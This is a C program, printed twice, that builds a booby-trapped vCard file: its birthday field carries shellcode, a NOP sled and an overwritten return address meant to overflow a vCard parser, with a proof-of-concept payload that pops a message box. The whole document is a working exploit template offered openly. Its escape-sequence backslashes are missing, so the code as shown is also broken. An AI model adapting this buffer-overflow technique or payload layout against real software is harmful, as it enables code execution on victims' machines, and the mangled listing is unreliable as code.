Code:
#include <stdio.h>
main()
{
FILE *f;
char eip[]="xc5x95x79x76"; /* jmp edi */
char shell_code[]=
"x33xF6x68x2Ex41xF5xBFx56xC7x02x76x43x61x72xC7x42x04x64x20x65"
"x78xC7x42x08x70x6Cx6Fx69xC7x42x0Cx74x20x62x79xC7x42x10x20x6B"
"x61x6Ax89x72x14x66xC7x42x14x6Cx61x52x52x56xFFx54x24x10";
/* Ovaj shell_code sto sam napisao radi sledece:
poziva MessageBoxA(0,"vCard exploit by kajla","vCard exploit by kajla",0)
xor esi,esi
push 0xBFF5412e ;adresa MessageBoxA() u user32.dll
push esi
mov dword ptr[edx],72614376h
mov dword ptr[edx+04h],78652064h
mov dword ptr[edx+08h],696f6c70h
mov dword ptr[edx+0Ch],79622074h
mov dword ptr[edx+010h],6a616b20h
mov dword ptr[edx+014h],esi
mov word ptr[edx+014h],616ch
push edx
push edx
push esi
call dword ptr[esp+010h] */
char nops[]="x90x90x90x90x90x90x90x90x90x90x90x90x90x90"; /* 14 NOPS */
char body_text[]=
"BEGIN:VCARDn"
"VERSION:2.1n"
"N:;kajlan"
"FN:kajlan"
"BDAY:";
char end_text[]=
"EMAIL;PREF;INTERNET:[email protected]"
"REV:20010728T152652Zn"
"END:VCARDn";
clrscr();
if ((f=fopen("vCard.vcf","w"))==NULL)
{
fprintf(stderr,"Cannot create file vCard.vcfn");
exit(1);
}
fprintf(f,"%s%s%s%sn%s",body_text,shell_code,nops,eip,end_text);
fclose(f);
printf("File: vCard.vcf created!");
getch();
return 0;
}
#include <stdio.h>
main()
{
FILE *f;
char eip[]="xc5x95x79x76"; /* jmp edi */
char shell_code[]=
"x33xF6x68x2Ex41xF5xBFx56xC7x02x76x43x61x72xC7x42x04x64x20x65"
"x78xC7x42x08x70x6Cx6Fx69xC7x42x0Cx74x20x62x79xC7x42x10x20x6B"
"x61x6Ax89x72x14x66xC7x42x14x6Cx61x52x52x56xFFx54x24x10";
/* Ovaj shell_code sto sam napisao radi sledece:
poziva MessageBoxA(0,"vCard exploit by kajla","vCard exploit by kajla",0)
xor esi,esi
push 0xBFF5412e ;adresa MessageBoxA() u user32.dll
push esi
mov dword ptr[edx],72614376h
mov dword ptr[edx+04h],78652064h
mov dword ptr[edx+08h],696f6c70h
mov dword ptr[edx+0Ch],79622074h
mov dword ptr[edx+010h],6a616b20h
mov dword ptr[edx+014h],esi
mov word ptr[edx+014h],616ch
push edx
push edx
push esi
call dword ptr[esp+010h] */
char nops[]="x90x90x90x90x90x90x90x90x90x90x90x90x90x90"; /* 14 NOPS */
char body_text[]=
"BEGIN:VCARDn"
"VERSION:2.1n"
"N:;kajlan"
"FN:kajlan"
"BDAY:";
char end_text[]=
"EMAIL;PREF;INTERNET:[email protected]"
"REV:20010728T152652Zn"
"END:VCARDn";
clrscr();
if ((f=fopen("vCard.vcf","w"))==NULL)
{
fprintf(stderr,"Cannot create file vCard.vcfn");
exit(1);
}
fprintf(f,"%s%s%s%sn%s",body_text,shell_code,nops,eip,end_text);
fclose(f);
printf("File: vCard.vcf created!");
getch();
return 0;
}